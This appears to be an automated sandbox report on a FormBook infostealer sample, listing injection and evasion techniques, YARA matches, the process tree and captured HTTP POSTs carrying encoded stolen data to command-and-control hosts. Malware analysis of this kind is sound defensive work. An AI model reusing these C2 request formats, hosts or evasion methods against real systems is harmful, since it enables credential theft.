Loading ...

Play interactive tourEdit tour

Analysis Report Mqbmupv_Signed_.exe

Overview

General Information

Sample Name:Mqbmupv_Signed_.exe
Analysis ID:288093
MD5:20a3b044b6d1b39051e35269e6590c0b
SHA1:bc6bc3a617091a5f13dcfe134b3a55d19e8f77e6
SHA256:2ead77594bc7d6fb376764fad896f830955a1ac70155c0f9feb42299f5c788a9
Tags:exe

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected FormBook malware
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Allocates memory in foreign processes
Creates a thread in another existing process (thread injection)
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Uses ipconfig to lookup or modify the Windows network settings
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • Mqbmupv_Signed_.exe (PID: 6892 cmdline: 'C:\Users\user\Desktop\Mqbmupv_Signed_.exe' MD5: 20A3B044B6D1B39051E35269E6590C0B)
    • notepad.exe (PID: 344 cmdline: C:\Windows\System32\Notepad.exe MD5: D693F13FE3AA2010B854C4C60671B8E2)
      • cmd.exe (PID: 6308 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Natso.bat MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 6436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 6316 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Natso.bat MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 5824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • ieinstal.exe (PID: 6544 cmdline: C:\Program Files (x86)\internet explorer\ieinstal.exe MD5: DAD17AB737E680C47C8A44CBB95EE67E)
      • explorer.exe (PID: 3376 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • Mqbmnet.exe (PID: 6912 cmdline: 'C:\Users\user\AppData\Local\Mqbmnet.exe' MD5: 20A3B044B6D1B39051E35269E6590C0B)
          • ieinstal.exe (PID: 2212 cmdline: C:\Program Files (x86)\internet explorer\ieinstal.exe MD5: DAD17AB737E680C47C8A44CBB95EE67E)
        • Mqbmnet.exe (PID: 5976 cmdline: 'C:\Users\user\AppData\Local\Mqbmnet.exe' MD5: 20A3B044B6D1B39051E35269E6590C0B)
          • ieinstal.exe (PID: 5204 cmdline: C:\Program Files (x86)\internet explorer\ieinstal.exe MD5: DAD17AB737E680C47C8A44CBB95EE67E)
        • autochk.exe (PID: 1748 cmdline: C:\Windows\SysWOW64\autochk.exe MD5: 34236DB574405291498BCD13D20C42EB)
        • ipconfig.exe (PID: 1372 cmdline: C:\Windows\SysWOW64\ipconfig.exe MD5: B0C7423D02A007461C850CD0DFE09318)
        • control.exe (PID: 4864 cmdline: C:\Windows\SysWOW64\control.exe MD5: 40FBA3FBFD5E33E0DE1BA45472FDA66F)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Mqbm.urlMethodology_Shortcut_HotKeyDetects possible shortcut usage for .URL persistence@itsreallynick (Nick Carr)
  • 0x87:$hotkey: \x0AHotKey=1
  • 0x0:$url_explicit: [InternetShortcut]
C:\Users\user\AppData\Local\Mqbm.urlMethodology_Contains_Shortcut_OtherURIhandlersDetects possible shortcut usage for .URL persistence@itsreallynick (Nick Carr)
  • 0x14:$file: URL=
  • 0x0:$url_explicit: [InternetShortcut]
C:\Users\user\AppData\Local\Mqbm.urlMethodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICODetects possible shortcut usage for .URL persistence@itsreallynick (Nick Carr)
  • 0x5c:$icon: IconFile=
  • 0x0:$url_explicit: [InternetShortcut]

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000015.00000003.340352815.0000000004464000.00000004.00000001.sdmpMethodology_Contains_Shortcut_OtherURIhandlersDetects possible shortcut usage for .URL persistence@itsreallynick (Nick Carr)
  • 0x1258:$file: URL=
  • 0x123c:$url_explicit: [InternetShortcut]
00000015.00000003.340352815.0000000004464000.00000004.00000001.sdmpMethodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICODetects possible shortcut usage for .URL persistence@itsreallynick (Nick Carr)
  • 0x1284:$icon: IconFile=
  • 0x123c:$url_explicit: [InternetShortcut]
00000000.00000003.218982955.00000000023A4000.00000004.00000001.sdmpMethodology_Contains_Shortcut_OtherURIhandlersDetects possible shortcut usage for .URL persistence@itsreallynick (Nick Carr)
  • 0x620:$file: URL=
  • 0x604:$url_explicit: [InternetShortcut]
00000000.00000003.218982955.00000000023A4000.00000004.00000001.sdmpMethodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICODetects possible shortcut usage for .URL persistence@itsreallynick (Nick Carr)
  • 0x64c:$icon: IconFile=
  • 0x604:$url_explicit: [InternetShortcut]
0000001D.00000002.399135517.0000000003800000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    Click to see the 49 entries

    Unpacked PEs

    SourceRuleDescriptionAuthorStrings
    29.2.ieinstal.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
      29.2.ieinstal.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8d52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14875:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14361:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14977:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x14aef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x976a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x135dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa463:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1a457:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1b46a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      29.2.ieinstal.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0x17539:$sqlite3step: 68 34 1C 7B E1
      • 0x1764c:$sqlite3step: 68 34 1C 7B E1
      • 0x17568:$sqlite3text: 68 38 2A 90 C5
      • 0x1768d:$sqlite3text: 68 38 2A 90 C5
      • 0x1757b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x176a3:$sqlite3blob: 68 53 D8 7F 8C
      9.2.ieinstal.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        9.2.ieinstal.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1b257:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1c26a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        Click to see the 7 entries

        Sigma Overview

        No Sigma rule has matched

        Signature Overview

        Click to jump to signature section

        Show All Signature Results

        AV Detection:

        barindex
        Multi AV Scanner detection for dropped fileShow sources
        Source: C:\Users\user\AppData\Local\Mqbmnet.exeVirustotal: Detection: 27%Perma Link
        Source: C:\Users\user\AppData\Local\Mqbmnet.exeReversingLabs: Detection: 45%
        Multi AV Scanner detection for submitted fileShow sources
        Source: Mqbmupv_Signed_.exeVirustotal: Detection: 27%Perma Link
        Source: Mqbmupv_Signed_.exeReversingLabs: Detection: 45%
        Yara detected FormBookShow sources
        Source: Yara matchFile source: 0000001D.00000002.399135517.0000000003800000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000019.00000002.474955241.0000000000910000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000019.00000002.474675547.00000000007D0000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000009.00000002.343939921.00000000009A0000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001E.00000002.397779969.0000000000F30000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000019.00000002.471509129.0000000000450000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000002.395148815.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000009.00000002.344896529.0000000002B30000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000009.00000002.343414825.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000002.397372666.0000000003490000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 29.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 9.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 9.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 29.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: 29.2.ieinstal.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
        Source: 9.2.ieinstal.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
        Source: C:\Windows\SysWOW64\notepad.exeCode function: 2_2_5048518C GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4x nop then pop esi
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4x nop then pop edi
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4x nop then pop edi

        Networking:

        barindex
        Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
        Source: TrafficSnort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.4:49754
        Source: global trafficHTTP traffic detected: GET /ksh/?5jL=uFQxALFPNtNHURy&ATxxQxK=xROuys6hOw0xE+Dg7XC6mGOo/d7SGNs3P82B+JeimXH5Y1WQGK5kyuWTJN9Z6xMQi+6b HTTP/1.1Host: www.thelocaladda.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /ksh/?ATxxQxK=ZldP4CUsQhXvJw3kkl/m6rn8dtomETaFfa4bezIFxsgv0fex9FlIh/12ILez0Zmx81j4&5jL=uFQxALFPNtNHURy HTTP/1.1Host: www.kingofinvest.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: Joe Sandbox ViewIP Address: 52.58.78.16 52.58.78.16
        Source: Joe Sandbox ViewIP Address: 162.159.129.233 162.159.129.233
        Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
        Source: Joe Sandbox ViewASN Name: GOOGLEUS GOOGLEUS
        Source: Joe Sandbox ViewJA3 fingerprint: ce5f3254611a8c095a3d821d44539877
        Source: global trafficHTTP traffic detected: POST /ksh/ HTTP/1.1Host: www.thelocaladda.comConnection: closeContent-Length: 413Cache-Control: no-cacheOrigin: http://www.thelocaladda.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.thelocaladda.com/ksh/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 41 54 78 78 51 78 4b 3d 35 7a 43 55 73 4a 36 4f 4d 44 34 64 51 39 4f 77 6c 33 53 73 77 52 43 4d 77 4f 72 48 4d 76 68 77 62 71 7e 43 68 36 61 41 71 58 28 76 4b 30 75 38 44 5a 73 2d 31 2d 48 73 53 76 4e 64 6b 44 4a 5f 6c 70 4b 52 65 6e 6c 34 50 63 69 55 4c 64 58 58 49 55 6d 7a 43 77 43 76 7a 56 52 62 68 63 6a 6d 76 47 59 69 39 33 72 67 66 69 66 5a 72 79 79 38 6c 77 61 49 72 6f 72 69 4b 35 35 65 52 6f 38 74 4f 75 55 30 31 76 37 4d 31 41 38 78 52 6b 4a 47 55 68 55 62 77 67 77 5f 58 75 44 48 79 70 35 77 6b 74 49 5f 47 68 79 73 55 6a 69 42 65 79 32 4e 30 4a 54 66 5a 61 30 71 53 45 76 7a 36 62 75 62 28 39 47 73 58 48 66 64 70 59 55 33 4b 6d 34 79 49 5a 73 50 57 4f 49 4d 63 46 57 56 6e 73 38 39 61 47 65 7a 65 38 64 74 79 44 33 6a 6a 6b 79 6c 4b 70 69 33 73 68 61 46 59 34 4b 47 47 65 49 41 76 63 41 58 75 5a 68 4e 75 70 31 35 5a 71 47 52 39 70 35 75 37 69 32 77 32 63 52 59 34 77 71 56 34 42 70 43 4a 56 6d 52 38 6e 69 38 49 5a 34 73 78 39 52 31 6a 5f 65 49 67 46 68 59 67 73 61 51 36 37 6e 45 7e 55 56 32 41 79 32 39 55 54 62 30 62 6e 6e 54 7e 6a 73 71 7a 43 4e 63 64 33 34 4b 57 78 38 72 57 2d 37 4a 6a 6b 6f 5f 79 69 5a 48 32 70 30 54 53 67 62 64 69 32 6e 71 6d 47 58 4e 35 55 4b 63 55 41 65 58 56 48 49 56 36 41 7a 72 69 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: ATxxQxK=5zCUsJ6OMD4dQ9Owl3SswRCMwOrHMvhwbq~Ch6aAqX(vK0u8DZs-1-HsSvNdkDJ_lpKRenl4PciULdXXIUmzCwCvzVRbhcjmvGYi93rgfifZryy8lwaIroriK55eRo8tOuU01v7M1A8xRkJGUhUbwgw_XuDHyp5wktI_GhysUjiBey2N0JTfZa0qSEvz6bub(9GsXHfdpYU3Km4yIZsPWOIMcFWVns89aGeze8dtyD3jjkylKpi3shaFY4KGGeIAvcAXuZhNup15ZqGR9p5u7i2w2cRY4wqV4BpCJVmR8ni8IZ4sx9R1j_eIgFhYgsaQ67nE~UV2Ay29UTb0bnnT~jsqzCNcd34KWx8rW-7Jjko_yiZH2p0TSgbdi2nqmGXN5UKcUAeXVHIV6AzriA).
        Source: global trafficHTTP traffic detected: POST /ksh/ HTTP/1.1Host: www.thelocaladda.comConnection: closeContent-Length: 184809Cache-Control: no-cacheOrigin: http://www.thelocaladda.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.thelocaladda.com/ksh/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 41 54 78 78 51 78 4b 3d 35 7a 43 55 73 49 79 77 4e 7a 38 41 62 75 71 78 6b 6a 4f 6b 30 52 7a 53 30 4e 65 42 46 64 67 4a 53 59 37 66 68 37 71 63 6e 32 50 62 5a 6c 65 38 49 37 31 32 78 65 48 72 55 76 4e 65 67 44 55 47 35 50 50 63 65 6d 68 47 50 63 71 54 46 37 54 65 49 45 6e 31 42 51 47 66 37 31 45 66 68 65 6e 58 75 6b 31 78 33 58 6e 67 62 53 58 62 67 79 50 75 73 52 57 78 31 4a 48 6e 4d 49 51 59 53 66 4d 5a 4e 4e 70 52 6b 75 6e 4b 6b 43 67 71 4e 31 35 36 65 57 41 75 7e 51 4d 34 59 49 65 61 76 59 31 38 6a 6f 70 4b 61 7a 61 74 57 54 71 4c 50 41 75 76 78 34 48 69 65 4c 46 4d 53 44 79 49 69 64 4f 47 31 65 79 6b 4d 55 4c 33 6d 4e 6b 70 45 31 51 71 43 36 45 59 51 4f 55 7a 54 6e 28 54 6a 5f 6f 6f 5a 45 58 30 51 39 45 56 28 52 66 76 70 77 33 61 4e 2d 36 76 77 52 72 56 51 66 75 72 4f 74 52 50 6f 66 73 6c 68 5a 67 6a 6f 5a 31 44 53 36 47 44 6f 35 39 35 37 78 76 51 32 66 42 77 32 41 47 49 37 45 70 43 54 45 32 69 7a 33 79 34 64 35 6f 55 31 2d 64 36 34 34 75 42 6a 46 67 66 67 75 79 50 36 37 6e 69 7e 56 55 68 41 47 65 39 56 42 54 72 59 41 7a 50 38 6a 74 6f 30 57 68 53 47 77 51 61 57 79 4d 72 4d 72 47 65 6a 55 51 5f 34 52 78 45 33 4c 63 54 52 51 62 64 6f 6d 6d 39 6a 47 79 6d 39 68 28 50 52 69 79 48 61 54 68 31 79 7a 61 77 33 2d 6c 42 44 56 7a 54 63 50 77 58 36 56 4d 70 70 55 75 61 65 6d 79 5f 59 73 77 74 76 64 65 4c 58 67 55 72 38 34 45 59 6a 53 41 56 37 4b 4c 68 6a 6d 55 6f 61 6b 6e 33 67 6f 6a 52 67 6d 77 6d 6b 2d 72 69 75 77 31 6f 6a 36 73 68 39 74 58 75 57 33 73 45 65 5a 37 69 32 56 71 63 67 33 7e 4b 47 55 58 57 6a 73 70 73 37 69 78 68 4b 69 74 33 72 64 56 6f 61 6e 74 49 28 43 31 5f 4b 6a 70 45 50 72 42 54 33 34 39 69 44 44 67 67 62 44 48 32 37 47 78 5a 73 48 66 31 34 65 71 33 52 44 70 69 70 54 30 58 48 51 30 31 6a 2d 6e 4b 56 72 41 54 4e 4f 4e 34 53 54 38 6b 71 64 42 62 72 79 55 42 55 53 67 6d 76 54 54 5a 6d 50 4a 36 36 54 69 31 39 37 54 41 52 50 38 42 35 75 63 68 59 6e 59 55 41 43 49 4b 45 62 32 68 43 71 7a 57 51 76 61 50 43 57 74 75 49 73 71 77 6c 77 43 41 33 70 75 48 4a 35 35 30 44 4f 50 70 32 4c 71 47 64 4a 74 73 38 57 38 5a 4c 30 46 6e 7a 70 61 76 4f 78 43 4e 54 4e 43 37 28 63 4f 61 42 39 48 68 41 4a 39 57 57 58 43 30 42 56 75 63 64 5f 42 58 6b 39 6c 35 28 78 69 6a 63 52 70 52 63 5f 4d 69 76 47 31 35 4a 4c 7a 41 6b 4c 69 33 31 35 5a 49 39 4f 67 4e 4a 77 6d 66 68 68 4d 65 45 70 72 6a 34 61 4c 6a 7a 33 66 55 67 36 4d 2d 74 73 68 55 58 7a 63 30 66 52 78 58 76 63 30 39 77 7a 38 56 6a 68 6d 6d 52 66 4e 31 52 6d 54 58 66 66 6d 66 74 55 72 61 5a 50 68 77 4c 5f 6d 58 75 48 6c 45 38 55 57 58 66 4c 6c 35 48 70 35 35 6d 71 76 45 28 67 53 53 33 49 62 56 4f 6b 3
        Source: global trafficHTTP traffic detected: POST /ksh/ HTTP/1.1Host: www.kingofinvest.comConnection: closeContent-Length: 413Cache-Control: no-cacheOrigin: http://www.kingofinvest.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.kingofinvest.com/ksh/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 41 54 78 78 51 78 4b 3d 52 48 52 31 6d 6c 4d 39 56 42 76 5a 4a 67 71 72 7e 67 65 75 68 4d 58 43 63 64 42 7a 54 44 53 64 62 38 42 4f 4b 53 64 63 34 5f 77 37 79 4e 48 71 31 30 78 52 75 70 77 31 58 4b 54 76 33 74 79 64 78 48 4f 5f 65 71 71 74 61 44 4d 6b 36 47 62 74 52 74 36 66 50 32 6f 6c 62 4f 33 50 63 50 4b 35 62 69 43 2d 54 46 66 6b 28 58 75 39 56 7a 6f 6f 61 36 4c 44 4e 74 68 57 37 2d 65 47 35 34 44 55 75 35 41 6a 55 38 6e 41 58 4a 75 69 61 6e 48 68 55 59 37 65 73 65 4a 4e 78 70 69 49 6e 66 56 55 68 2d 5a 45 72 41 68 53 4a 6b 64 66 46 69 50 38 42 6b 6e 58 6a 6b 79 38 37 5a 75 4c 62 44 4c 7a 37 51 6c 62 74 70 36 4a 55 59 43 57 73 54 48 32 62 30 4e 41 59 4e 45 69 38 5f 74 45 43 74 52 4f 49 7a 39 2d 58 2d 75 46 56 4a 44 77 46 57 65 4b 6d 34 4d 76 6a 73 35 49 69 4f 79 74 30 73 66 41 66 63 61 44 70 55 39 32 31 58 74 52 4e 52 73 64 78 4f 68 62 71 33 4c 45 66 78 59 72 30 77 57 34 78 73 6b 5a 44 4f 45 45 56 37 53 73 6b 35 34 4d 65 45 64 45 4b 35 68 37 59 6d 68 62 48 52 6b 42 52 31 69 63 66 33 7e 45 32 71 45 5f 68 78 46 62 6c 45 67 4f 6c 4d 44 34 42 58 63 75 58 52 41 76 79 32 48 56 53 49 45 6e 65 67 35 68 39 59 77 48 34 39 45 33 55 30 47 67 7e 61 76 65 33 34 63 55 4c 4d 50 73 31 36 66 45 77 52 76 54 64 31 6a 6e 31 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: ATxxQxK=RHR1mlM9VBvZJgqr~geuhMXCcdBzTDSdb8BOKSdc4_w7yNHq10xRupw1XKTv3tydxHO_eqqtaDMk6GbtRt6fP2olbO3PcPK5biC-TFfk(Xu9Vzooa6LDNthW7-eG54DUu5AjU8nAXJuianHhUY7eseJNxpiInfVUh-ZErAhSJkdfFiP8BknXjky87ZuLbDLz7Qlbtp6JUYCWsTH2b0NAYNEi8_tECtROIz9-X-uFVJDwFWeKm4Mvjs5IiOyt0sfAfcaDpU921XtRNRsdxOhbq3LEfxYr0wW4xskZDOEEV7Ssk54MeEdEK5h7YmhbHRkBR1icf3~E2qE_hxFblEgOlMD4BXcuXRAvy2HVSIEneg5h9YwH49E3U0Gg~ave34cULMPs16fEwRvTd1jn1A).
        Source: global trafficHTTP traffic detected: POST /ksh/ HTTP/1.1Host: www.kingofinvest.comConnection: closeContent-Length: 184809Cache-Control: no-cacheOrigin: http://www.kingofinvest.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.kingofinvest.com/ksh/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 41 54 78 78 51 78 4b 3d 52 48 52 31 6d 6b 55 44 5a 52 36 66 65 69 7e 75 38 77 4f 51 72 63 6e 63 4c 4e 38 70 44 68 43 6e 46 39 68 6b 4b 54 4d 30 68 75 67 54 31 75 50 71 33 33 5a 63 6a 70 77 36 66 71 54 75 6d 64 32 50 38 33 6e 79 65 72 75 44 61 44 31 79 73 77 33 6f 53 39 36 75 4f 57 74 42 4b 65 7a 59 63 4e 7e 51 62 42 7a 34 55 46 6a 6b 31 48 47 5f 61 79 35 75 64 37 48 51 41 39 39 58 35 36 61 62 35 4f 28 38 76 61 38 64 64 64 37 43 56 4f 53 70 57 48 33 4a 43 62 62 42 69 75 4e 4b 7e 49 32 58 36 73 77 54 73 62 30 78 33 56 56 52 41 30 46 42 4f 41 57 44 45 51 57 68 76 55 43 6f 37 61 50 77 42 68 50 75 28 54 41 58 76 62 66 42 4e 38 36 55 31 79 48 59 4e 48 70 78 61 4e 55 64 68 4b 52 44 55 39 38 61 50 78 30 31 49 50 47 32 59 62 6e 43 4f 45 47 79 6c 72 67 6e 72 4d 70 6e 75 70 48 74 6d 39 7e 4e 63 65 33 51 32 45 39 64 33 58 74 56 5a 78 73 4c 36 49 39 71 70 48 61 69 66 79 34 48 7e 44 43 39 79 71 6b 5a 4e 4c 5a 34 58 4c 43 65 72 74 45 65 54 6e 78 44 49 2d 68 59 64 6d 68 39 48 51 49 38 52 31 69 51 66 32 7e 2d 6b 6f 34 5f 6e 6b 4a 79 78 44 55 34 6a 4d 43 69 43 44 34 73 4d 58 73 5f 79 79 6a 56 41 4e 41 4e 65 54 5a 68 72 5a 41 45 34 5a 51 33 56 6b 47 67 34 61 75 6f 37 34 31 48 50 4f 69 52 6b 35 54 73 31 6e 65 6a 59 55 4b 66 70 62 62 71 37 52 37 35 4e 56 4d 71 77 5a 59 4c 47 2d 4e 67 76 32 69 54 64 75 4b 52 6e 69 7e 5a 4c 43 46 62 66 79 4d 30 50 5f 33 34 67 50 69 6d 45 32 76 35 4e 6b 34 57 71 6a 6a 74 6e 72 42 66 66 39 70 6d 32 48 37 42 4f 6e 31 66 30 54 50 4a 52 4c 6e 41 67 46 64 43 32 69 53 4a 54 4d 6a 31 51 47 54 38 59 44 50 30 61 4b 68 74 28 57 78 30 6f 76 72 41 69 43 58 47 42 4c 68 70 6e 7a 62 71 4b 56 65 50 36 57 72 2d 28 4e 71 69 5a 79 56 5f 38 5a 56 62 57 43 39 71 4d 69 42 65 79 5a 58 47 62 65 75 70 52 4c 38 61 44 70 59 36 4b 68 65 5a 4a 5f 49 46 42 44 35 30 64 49 63 7a 76 61 76 6e 6e 54 42 62 75 75 54 54 62 2d 39 52 32 79 65 75 61 61 49 75 5a 4d 43 70 28 48 49 57 59 56 4f 58 55 70 79 78 4f 31 4a 51 79 4e 54 7a 53 65 62 74 36 77 66 4f 58 58 42 63 77 39 7a 74 57 6d 69 6b 54 44 37 4f 6b 5f 7e 48 57 4b 34 63 78 5a 44 4d 37 52 59 37 44 35 28 72 35 47 4e 62 67 41 68 78 34 33 45 44 63 32 4e 2d 54 50 5a 49 78 47 44 59 4a 65 54 55 56 52 64 6d 6e 66 73 71 4e 37 39 7a 69 79 67 59 51 49 6e 76 70 30 55 64 41 44 36 62 45 62 59 51 59 67 6e 48 69 73 71 6e 66 38 61 74 42 53 38 51 33 4d 54 53 6e 61 33 32 42 37 68 35 75 6e 71 6b 75 5a 78 58 6a 62 32 33 6f 67 49 67 4c 44 47 56 75 72 52 67 28 46 39 34 41 77 35 52 64 37 52 5a 79 35 71 55 72 33 43 7a 63 7a 63 55 72 31 4c 35 66 49 4d 41 34 41 49 56 4a 4d 6d 70 5a 34 63 64 41 30 4b 63 53 70 6e 61 7e 59 4b 32 6f 47 71 31 72 54 2
        Source: global trafficHTTP traffic detected: GET /ksh/?5jL=uFQxALFPNtNHURy&ATxxQxK=xROuys6hOw0xE+Dg7XC6mGOo/d7SGNs3P82B+JeimXH5Y1WQGK5kyuWTJN9Z6xMQi+6b HTTP/1.1Host: www.thelocaladda.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /ksh/?ATxxQxK=ZldP4CUsQhXvJw3kkl/m6rn8dtomETaFfa4bezIFxsgv0fex9FlIh/12ILez0Zmx81j4&5jL=uFQxALFPNtNHURy HTTP/1.1Host: www.kingofinvest.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: unknownDNS traffic detected: queries for: cdn.discordapp.com
        Source: unknownHTTP traffic detected: POST /ksh/ HTTP/1.1Host: www.thelocaladda.comConnection: closeContent-Length: 413Cache-Control: no-cacheOrigin: http://www.thelocaladda.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.thelocaladda.com/ksh/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 41 54 78 78 51 78 4b 3d 35 7a 43 55 73 4a 36 4f 4d 44 34 64 51 39 4f 77 6c 33 53 73 77 52 43 4d 77 4f 72 48 4d 76 68 77 62 71 7e 43 68 36 61 41 71 58 28 76 4b 30 75 38 44 5a 73 2d 31 2d 48 73 53 76 4e 64 6b 44 4a 5f 6c 70 4b 52 65 6e 6c 34 50 63 69 55 4c 64 58 58 49 55 6d 7a 43 77 43 76 7a 56 52 62 68 63 6a 6d 76 47 59 69 39 33 72 67 66 69 66 5a 72 79 79 